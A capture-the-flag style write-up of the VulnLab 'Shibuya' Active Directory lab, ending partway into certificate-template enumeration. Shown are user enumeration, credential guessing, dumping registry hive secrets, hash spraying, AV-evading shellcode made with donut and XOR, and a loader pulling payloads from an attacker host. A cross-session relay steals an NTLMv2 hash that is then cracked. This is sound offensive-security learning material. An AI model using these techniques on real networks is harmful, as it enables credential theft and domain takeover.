VulnLab Shibuya
VulnLab Shibuya
VulnLab Shibuya
Shibuya
Recon
1
2
3
4
5
6
7
8
9
10
11
22/tcp open ssh
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
└─$ nmap -sC -sV -p22,53,88,135,139,445,464,593,3268,3269,3389,5357,9389 10.10.112.188
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 23:08 +06
Nmap scan report for 10.10.112.188
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-21 17:07:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: shibuya.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=AWSJPDC0522.shibuya.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:AWSJPDC0522.shibuya.vl
| Not valid before: 2025-02-15T07:26:20
|_Not valid after: 2026-02-15T07:26:20
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: shibuya.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AWSJPDC0522.shibuya.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:AWSJPDC0522.shibuya.vl
| Not valid before: 2025-02-15T07:26:20
|_Not valid after: 2026-02-15T07:26:20
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AWSJPDC0522.shibuya.vl
| Not valid before: 2025-02-18T08:24:25
|_Not valid after: 2025-08-20T08:24:25
|_ssl-date: 2025-02-21T17:08:35+00:00; -1m26s from scanner time.
| rdp-ntlm-info:
| Target_Name: SHIBUYA
| NetBIOS_Domain_Name: SHIBUYA
| NetBIOS_Computer_Name: AWSJPDC0522
| DNS_Domain_Name: shibuya.vl
| DNS_Computer_Name: AWSJPDC0522.shibuya.vl
| DNS_Tree_Name: shibuya.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-02-21T17:07:55+00:00
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: AWSJPDC0522; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-21T17:07:56
|_ start_date: N/A
|_clock-skew: mean: -1m26s, deviation: 0s, median: -1m26s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.98 seconds
User
No anonymous smb access and null session. We also can’t rid-brute force it due to that
1
2
3
└─$ nxc smb 10.10.112.188 -u 'Guest' -p '' --shares
SMB 10.10.112.188 445 AWSJPDC0522 [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.188 445 AWSJPDC0522 [-] shibuya.vl\Guest: STATUS_ACCOUNT_DISABLED
Same goes for LDAP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ ldapsearch -H ldap://10.10.112.188:3268 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=shibuya,DC=vl
namingcontexts: CN=Configuration,DC=shibuya,DC=vl
namingcontexts: CN=Schema,CN=Configuration,DC=shibuya,DC=vl
namingcontexts: DC=DomainDnsZones,DC=shibuya,DC=vl
namingcontexts: DC=ForestDnsZones,DC=shibuya,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ ldapsearch -H ldap://10.10.112.188:3268 -x -b 'DC=shibuya,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=shibuya,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CB6, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
Nothing on RPC
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ rpcclient -N -U "" 10.10.112.188
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> getusername
Account Name: ANONYMOUS LOGON, Authority Name: NT AUTHORITY
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $>
Let’s try enumerating users with kerbrute. We find red user
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt -d shibuya.vl --dc 10.10.112.188
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 02/21/25 - Ronnie Flathers @ropnop
2025/02/21 23:23:38 > Using KDC(s):
2025/02/21 23:23:38 > 10.10.112.188:88
2025/02/21 23:27:22 > [+] VALID USERNAME: red@shibuya.vl
2025/02/21 23:28:34 > Done! Tested 10177 usernames (1 valid) in 295.663 seconds
We can use cupp, but there is a catch. It doesn’t add basic case, where username==password, thus might miss the obvious case.
Spend too much time assuming that the red:<REDACTED> was incorrect, which lead to wordlist creation and trying to kerbrute it. But since, cupp didn’t add red as password, thus wasted time.
1
2
3
└─$ nxc smb 10.10.112.188 -u 'red' -p '<REDACTED>'
SMB 10.10.112.188 445 AWSJPDC0522 [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.188 445 AWSJPDC0522 [-] shibuya.vl\red:<REDACTED> STATUS_LOGON_FAILURE
So check kerberos auth too and to make sure that basic password is indeed incorrect. In this case red:<REDACTED> is valid via kerberos auth.
1
2
3
└─$ nxc smb 10.10.112.188 -u 'red' -p '<REDACTED>' -k
SMB 10.10.112.188 445 AWSJPDC0522 [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.188 445 AWSJPDC0522 [+] shibuya.vl\red:<REDACTED>
Let’s check shares
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.112.188 -u 'red' -p '<REDACTED>' -k --shares
SMB 10.10.112.188 445 AWSJPDC0522 [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.188 445 AWSJPDC0522 [+] shibuya.vl\red:<REDACTED>
SMB 10.10.112.188 445 AWSJPDC0522 [*] Enumerated shares
SMB 10.10.112.188 445 AWSJPDC0522 Share Permissions Remark
SMB 10.10.112.188 445 AWSJPDC0522 ----- ----------- ------
SMB 10.10.112.188 445 AWSJPDC0522 ADMIN$ Remote Admin
SMB 10.10.112.188 445 AWSJPDC0522 C$ Default share
SMB 10.10.112.188 445 AWSJPDC0522 images$
SMB 10.10.112.188 445 AWSJPDC0522 IPC$ READ Remote IPC
SMB 10.10.112.188 445 AWSJPDC0522 NETLOGON READ Logon server share
SMB 10.10.112.188 445 AWSJPDC0522 SYSVOL READ Logon server share
SMB 10.10.112.188 445 AWSJPDC0522 users READ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ smbclient.py shibuya.vl/red:<REDACTED>@awsjpdc0522.shibuya.vl -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
Type help for list of commands
# use users
# ls
drw-rw-rw- 0 Sun Feb 16 16:50:59 2025 .
drw-rw-rw- 0 Wed Feb 19 18:59:37 2025 ..
drw-rw-rw- 0 Sat Feb 15 12:49:31 2025 Administrator
drw-rw-rw- 0 Sat Feb 15 21:48:20 2025 All Users
drw-rw-rw- 0 Sat Feb 15 21:49:12 2025 Default
drw-rw-rw- 0 Sat Feb 15 21:48:20 2025 Default User
-rw-rw-rw- 174 Sat Feb 15 21:46:52 2025 desktop.ini
drw-rw-rw- 0 Wed Feb 19 01:29:42 2025 nigel.mills
drw-rw-rw- 0 Sat Feb 15 12:49:31 2025 Public
drw-rw-rw- 0 Wed Feb 19 01:36:45 2025 simon.watson
Nothing interesting, let’s enumerate domain with powerview.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ powerview shibuya.vl/red:<REDACTED>@awsjpdc0522.shibuya.vl -k --use-gc
Logging directory is set to /home/kali/.powerview/logs/shibuya-red-awsjpdc0522.shibuya.vl
(GC)-[AWSJPDC0522.shibuya.vl]-[SHIBUYA\RED$]
PV > Get-NetUser -SPN
cn : krbtgt
description : Key Distribution Center Service Account
distinguishedName : CN=krbtgt,CN=Users,DC=shibuya,DC=vl
memberOf : CN=Denied RODC Password Replication Group,CN=Users,DC=shibuya,DC=vl
name : krbtgt
objectGUID : {16fdd770-027b-479f-8e3b-d1d2c94d81ff}
userAccountControl : ACCOUNTDISABLE [514]
NORMAL_ACCOUNT
primaryGroupID : 513
objectSid : S-1-5-21-87560095-894484815-3652015022-502
sAMAccountName : krbtgt
sAMAccountType : SAM_USER_OBJECT
servicePrincipalName : kadmin/changepw
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=shibuya,DC=vl
(GC)-[AWSJPDC0522.shibuya.vl]-[SHIBUYA\RED$]
PV > Get-NetUser -PreauthNotRequired
(GC)-[AWSJPDC0522.shibuya.vl]-[SHIBUYA\RED$]
PV >
Found credentials for svc_autojoin
1
2
3
4
5
6
7
8
(GC)-[AWSJPDC0522.shibuya.vl]-[SHIBUYA\RED$]
PV > Get-NetUser -Properties samaccountname,description
sAMAccountName : Martyn.Turner
<SNIP>
description : <REDACTED>
sAMAccountName : svc_autojoin
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.112.188 -u svc_autojoin -p '<REDACTED>' --shares
SMB 10.10.112.188 445 AWSJPDC0522 [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.188 445 AWSJPDC0522 [+] shibuya.vl\svc_autojoin:<REDACTED>
SMB 10.10.112.188 445 AWSJPDC0522 [*] Enumerated shares
SMB 10.10.112.188 445 AWSJPDC0522 Share Permissions Remark
SMB 10.10.112.188 445 AWSJPDC0522 ----- ----------- ------
SMB 10.10.112.188 445 AWSJPDC0522 ADMIN$ Remote Admin
SMB 10.10.112.188 445 AWSJPDC0522 C$ Default share
SMB 10.10.112.188 445 AWSJPDC0522 images$ READ
SMB 10.10.112.188 445 AWSJPDC0522 IPC$ READ Remote IPC
SMB 10.10.112.188 445 AWSJPDC0522 NETLOGON READ Logon server share
SMB 10.10.112.188 445 AWSJPDC0522 SYSVOL READ Logon server share
SMB 10.10.112.188 445 AWSJPDC0522 users READ
We have new share images$ that we can read. It contains backup images
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.112.188 -u svc_autojoin -p '<REDACTED>' --spider 'images$' --regex .
SMB 10.10.112.188 445 AWSJPDC0522 [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.188 445 AWSJPDC0522 [+] shibuya.vl\svc_autojoin:<REDACTED>
SMB 10.10.112.188 445 AWSJPDC0522 [*] Started spidering
SMB 10.10.112.188 445 AWSJPDC0522 [*] Spidering .
SMB 10.10.112.188 445 AWSJPDC0522 //10.10.112.188/images$/. [dir]
SMB 10.10.112.188 445 AWSJPDC0522 //10.10.112.188/images$/.. [dir]
SMB 10.10.112.188 445 AWSJPDC0522 //10.10.112.188/images$/AWSJPWK0222-01.wim [lastm:'2025-02-19 23:35' size:8264070]
SMB 10.10.112.188 445 AWSJPDC0522 //10.10.112.188/images$/AWSJPWK0222-02.wim [lastm:'2025-02-19 23:35' size:50660968]
SMB 10.10.112.188 445 AWSJPDC0522 //10.10.112.188/images$/AWSJPWK0222-03.wim [lastm:'2025-02-19 23:35' size:32065850]
SMB 10.10.112.188 445 AWSJPDC0522 //10.10.112.188/images$/vss-meta.cab [lastm:'2025-02-19 23:35' size:365686]
SMB 10.10.112.188 445 AWSJPDC0522 [*] Done spidering (Completed in 0.5761630535125732)
Let’s download files
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ smbclient.py shibuya.vl/svc_autojoin:'<REDACTED>'@AWSJPDC0522.shibuya.vl -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
Type help for list of commands
# use images$
# ls
drw-rw-rw- 0 Wed Feb 19 23:35:20 2025 .
drw-rw-rw- 0 Wed Feb 19 18:59:37 2025 ..
-rw-rw-rw- 8264070 Wed Feb 19 23:35:20 2025 AWSJPWK0222-01.wim
-rw-rw-rw- 50660968 Wed Feb 19 23:35:20 2025 AWSJPWK0222-02.wim
-rw-rw-rw- 32065850 Wed Feb 19 23:35:20 2025 AWSJPWK0222-03.wim
-rw-rw-rw- 365686 Wed Feb 19 23:35:20 2025 vss-meta.cab
# get vss-meta.cab
# get AWSJPWK0222-03.wim
# get AWSJPWK0222-02.wim
# get AWSJPWK0222-01.wim
We can use PowerISO to read the images. Inside AWSJPWK0222-02.wim we find registry files. So let’s dump them
Now, we can either use secretsdump or pypykatz
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x2e971736685fc53bfd5106d471e2f00f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9dc1b36c1e31da7926d77ba67c654ae6:::
operator:1000:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Dumping cached domain logon information (domain/username:hash)
SHIBUYA.VL/Simon.Watson:$DCC2$10240#Simon.Watson#04b20c71b23baf7a3025f40b3409e325: (2025-02-16 11:17:56)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:2f006b004e0045004c0045003f0051005800290040004400580060005300520079002600610027002f005c002e002e0053006d0037002200540079005e0044003e004e0056005f00610063003d00270051002e00780075005b0075005c00410056006e004200230066004a0029006f007a002a005700260031005900450064003400240035004b0079004d006f004f002100750035005e0043004e002500430050006e003a00570068005e004e002a0076002a0043005a006c003d00640049002e006d005a002d002d006e0056002000270065007100330062002f00520026006b00690078005b003600670074003900
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1fe837c138d1089c9a0763239cd3cb42
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb31a4d81f2df440f806871a8b5f53a15de12acc1
dpapi_userkey:0xe14c10978f8ee226cbdbcbee9eac18a28b006d06
[*] NL$KM
0000 92 B9 89 EF 84 2F D6 55 73 67 31 8F E0 02 02 66 ...../.Usg1....f
0010 F9 81 42 68 8C 3B DF 5D 0A E5 BA F2 4A 2C 43 0E ..Bh.;.]....J,C.
0020 1C C5 4F 40 1E F5 98 38 2F A4 17 F3 E9 D9 23 E3 ..O@...8/.....#.
0030 D1 49 FE 06 B3 2C A1 1A CB 88 E4 1D 79 9D AE 97 .I...,......y...
NL$KM:92b989ef842fd6557367318fe0020266f98142688c3bdf5d0ae5baf24a2c430e1cc54f401ef598382fa417f3e9d923e3d149fe06b32ca11acb88e41d799dae97
[*] Cleaning up...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
└─$ pypykatz registry --sam SAM --security SECURITY --software SOFTWARE SYSTEM
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 2e971736685fc53bfd5106d471e2f00f
============== SAM hive secrets ==============
HBoot Key: 22d587da2426afe6a88a8d6d863b94ee10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9dc1b36c1e31da7926d77ba67c654ae6:::
operator:1000:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
============== SECURITY hive secrets ==============
Iteration count: 10240
Secrets structure format : VISTA
LSA Key: 3ad32138eed69d7bb34031499cde856307fe28421ae319e78cf09ade35adfade
NK$LM Key: 4000000000000000000000000000000092b989ef842fd6557367318fe0020266f98142688c3bdf5d0ae5baf24a2c430e1cc54f401ef598382fa417f3e9d923e3d149fe06b32ca11acb88e41d799dae97ba30a158669a4400fd1c2519fa63f5c4
SHIBUYA.VL/Simon.Watson:*2025-02-16 11:17:56*$DCC2$10240#Simon.Watson#04b20c71b23baf7a3025f40b3409e325
=== LSA Machine account password ===
History: False
NT: 1fe837c138d1089c9a0763239cd3cb42
Password(hex): 2f006b004e0045004c0045003f0051005800290040004400580060005300520079002600610027002f005c002e002e0053006d0037002200540079005e0044003e004e0056005f00610063003d00270051002e00780075005b0075005c00410056006e004200230066004a0029006f007a002a005700260031005900450064003400240035004b0079004d006f004f002100750035005e0043004e002500430050006e003a00570068005e004e002a0076002a0043005a006c003d00640049002e006d005a002d002d006e0056002000270065007100330062002f00520026006b00690078005b003600670074003900
Kerberos password(hex): 2f6b4e454c453f515829404458605352792661272f5c2e2e536d372254795e443e4e565f61633d27512e78755b755c41566e4223664a296f7a2a5726315945643424354b794d6f4f2175355e434e2543506e3a57685e4e2a762a435a6c3d64492e6d5a2d2d6e562027657133622f52266b69785b36677439
=== LSA Machine account password ===
History: True
NT: 1fe837c138d1089c9a0763239cd3cb42
Password(hex): 2f006b004e0045004c0045003f0051005800290040004400580060005300520079002600610027002f005c002e002e0053006d0037002200540079005e0044003e004e0056005f00610063003d00270051002e00780075005b0075005c00410056006e004200230066004a0029006f007a002a005700260031005900450064003400240035004b0079004d006f004f002100750035005e0043004e002500430050006e003a00570068005e004e002a0076002a0043005a006c003d00640049002e006d005a002d002d006e0056002000270065007100330062002f00520026006b00690078005b003600670074003900
Kerberos password(hex): 2f6b4e454c453f515829404458605352792661272f5c2e2e536d372254795e443e4e565f61633d27512e78755b755c41566e4223664a296f7a2a5726315945643424354b794d6f4f2175355e434e2543506e3a57685e4e2a762a435a6c3d64492e6d5a2d2d6e562027657133622f52266b69785b36677439
=== LSA DPAPI secret ===
History: False
Machine key (hex): b31a4d81f2df440f806871a8b5f53a15de12acc1
User key(hex): e14c10978f8ee226cbdbcbee9eac18a28b006d06
=== LSA DPAPI secret ===
History: True
Machine key (hex): 80be45ec04a3ee662b5691dffc0d8b2d8e937437
User key(hex): e8bb42e7c89a065dd946983b775ad69a921511e5
=== LSASecret NL$KM ===
History: False
Secret:
00000000: 92 b9 89 ef 84 2f d6 55 73 67 31 8f e0 02 02 66 |...../.Usg1....f|
00000010: f9 81 42 68 8c 3b df 5d 0a e5 ba f2 4a 2c 43 0e |..Bh.;.]....J,C.|
00000020: 1c c5 4f 40 1e f5 98 38 2f a4 17 f3 e9 d9 23 e3 |..O@...8/.....#.|
00000030: d1 49 fe 06 b3 2c a1 1a cb 88 e4 1d 79 9d ae 97 |.I...,......y...|
=== LSASecret NL$KM ===
History: True
Secret:
00000000: 92 b9 89 ef 84 2f d6 55 73 67 31 8f e0 02 02 66 |...../.Usg1....f|
00000010: f9 81 42 68 8c 3b df 5d 0a e5 ba f2 4a 2c 43 0e |..Bh.;.]....J,C.|
00000020: 1c c5 4f 40 1e f5 98 38 2f a4 17 f3 e9 d9 23 e3 |..O@...8/.....#.|
00000030: d1 49 fe 06 b3 2c a1 1a cb 88 e4 1d 79 9d ae 97 |.I...,......y...|
============== SOFTWARE hive secrets ==============
default_logon_user:
default_logon_domain:
default_logon_password: None
We can try cracking Simon.Watson’s cached credentials, but it won’t crack
We could dump all users with powerview and spray the hashes. The operator’s one work for simon.watson
1
2
3
4
5
6
└─$ nxc smb AWSJPDC0522.shibuya.vl -u users.txt -H '<REDACTED>' -k --continue-on-success
SMB AWSJPDC0522.shibuya.vl 445 AWSJPDC0522 [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB AWSJPDC0522.shibuya.vl 445 AWSJPDC0522 [-] shibuya.vl\Martyn.Turner:<REDACTED> KDC_ERR_PREAUTH_FAILED
<SNIP>
SMB AWSJPDC0522.shibuya.vl 445 AWSJPDC0522 [+] shibuya.vl\simon.watson:<REDACTED>
<SNIP>
Also, we can’t connect data via default LDAP port, so had to install Rusthound which has option to set LDAP port. We can also configure iptables to forward from 389 port to 3268 port
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ rusthound -u svc_autojoin -p '<REDACTED>' -d shibuya.vl -P 3268 -i 10.10.110.233 -f AWSJPDC0522.shibuya.vl -z
---------------------------------------------------
Initializing RustHound at 01:28:02 on 02/23/25
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2025-02-22T19:28:02Z INFO rusthound] Verbosity level: Info
[2025-02-22T19:28:02Z INFO rusthound::ldap] Connected to SHIBUYA.VL Active Directory!
[2025-02-22T19:28:02Z INFO rusthound::ldap] Starting data collection...
[2025-02-22T19:28:06Z INFO rusthound::ldap] All data collected for NamingContext DC=shibuya,DC=vl
<SNIP>
RustHound Enumeration Completed at 01:28:06 on 02/23/25! Happy Graphing!
We can confirm that simon.watson has ssh permissions
Using TGT for ssh didn’t work (might be skill issue), so we can change the password and connect to host via ssh.
1
2
3
4
5
6
└─$ changepasswd.py shibuya.vl/simon.watson@AWSJPDC0522.shibuya.vl -hashes ':<REDACTED>' -newpass 'P@ssw0rd!!!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of shibuya.vl\simon.watson
[*] Connecting to DCE/RPC as shibuya.vl\simon.watson
[*] Password was changed successfully.
1
2
3
4
5
6
7
└─$ ssh simon.watson@shibuya.vl
simon.watson@shibuya.vl's password:
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.
shibuya\simon.watson@AWSJPDC0522 C:\Users\simon.watson>
Root
Enumeration shows nothing. Also looks like there are no sessions.
1
2
3
PS C:\Users\simon.watson> qwinsta *
No session exists for *
PS C:\Users\simon.watson>
But I was hinted that there should be sessions and there’s a post explaining how to view sessions using RunasCs.exe. Let’s run donut on RunasCs with parameters, since there’s AV.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ donut -i RunasCs.exe -p "x x qwinsta -l 9" -o runascs.bin
[ Donut shellcode generator v1 (built Oct 23 2024 07:56:47)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "/home/kali/tools/red-team/c2-toolkit/RunasCs.exe"
[ Entropy : Random names + Encryption
[ File type : .NET EXE
[ Parameters : x x qwinsta -l 9
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "runascs.bin"
[ Exit : Thread
Now, I will xor the binary (my loader uses xor encryption)
1
└─$ python3 xor.py runascs.bin 13 runascs.run
I have my own staging loader that uses local mapping injection technique to run tools and remote injection to deploy beacons (not the best solution, but for this kind of tasks works fine). Seems like there’s another session by nigel.mills.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\programdata> ./rloader.exe web runt http://10.8.4.147/runascs.run
[i] Start ...
[i] Start to retrieve payload from: h
[i] Writing Shellcode To The Target Location ...
[+] Running tool
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
rdp-tcp#0 nigel.mills 1 Active
console 2 Conn
31c5ce94259d4... 65536 Listen
rdp-tcp 65537 Listen
[+] DONE Execuction
We can try cross session relay discussed in HTB Absolute/HTB Rebound boxes. Setup socat required by RemotePotato0 to relay the traffic
1
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.84.227:8888
Now generate payload for RemotePotato0. Need to use different port (not the one from examples in repo) to make it work
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ donut -i RemotePotato0.exe -p "-m 2 -s 1 -x 10.8.4.147 -p 8888" -o potato.bin
[ Donut shellcode generator v1 (built Oct 23 2024 07:56:47)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "/home/kali/tools/red-team/c2-toolkit/RemotePotato0.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Parameters : -m 2 -s 1 -x 10.8.4.147 -p 9999
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "potato.bin"
[ Exit : Thread
``` ```
└─$ python3 xor.py potato.bin 13 potato.run
Now run the tool
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
PS C:\programdata> ./rloader.exe web runt http://10.8.4.147/potato.run
[i] Start ...
[i] Start to retrieve payload from: h
[i] Writing Shellcode To The Target Location ...
[+] Running tool
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 8888
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP::8888
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 8888 ...
[*] IStoragetrigger written: 102 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 8888
[+] User hash stolen!
NTLMv2 Client : AWSJPDC0522
NTLMv2 Username : SHIBUYA\Nigel.Mills
NTLMv2 Hash : Nigel.Mills::SHIBUYA:e312c32e0ce8503c:422ec1c91294a1b2110f368875fb511d:<SNIP>00000000000000000000000000000000000090000000000000000000000
Now crack it with hashcat
1
2
3
4
5
└─$ hashcat -m 5600 -a 0 nigel.mills.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
NIGEL.MILLS::SHIBUYA:e312c32e0ce8503c:422ec1c91294a1b2110f368875fb511d:<SNIP>00000000000000000000000000000000000090000000000000000000000:<REDACTED>
<SNIP>
Since nigel.mills is a member of t1_admins and who can RDP
1
2
3
4
5
6
└─$ xfreerdp /v:AWSJPDC0522.shibuya.vl /u:nigel.mills /p:'<REDACTED>' /d:shibuya.vl /dynamic-resolution /drive:.,linux
[23:15:39:596] [91729:91730] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[23:15:39:596] [91729:91730] [WARN][com.freerdp.crypto] - CN = AWSJPDC0522.shibuya.vl
Certificate details for AWSJPDC0522.shibuya.vl:3389 (RDP-Server):
Common Name: AWSJPDC0522.shibuya.vl
PrivescCheck and WinPeas showed nothing. Also noticed that we have CA running
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<SNIP>
CA Name : AWSJPDC0522.shibuya.vl\shibuya-AWSJPDC0522-CA
Template Name : ShibuyaWeb
Schema Version : 2
Validity Period : 100 years
Renewal Period : 75 years
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Any Purpose, Server Authentication
mspki-certificate-application-policy : Any Purpose, Server Authentication
Permissions
Enrollment Permissions
Enrollment Rights : SHIBUYA\Domain Admins S-1-5-21-87560095-894484815-3652015022-512
SHIBUYA\Enterprise Admins S-1-5-21-87560095-894484815-3652015022-519
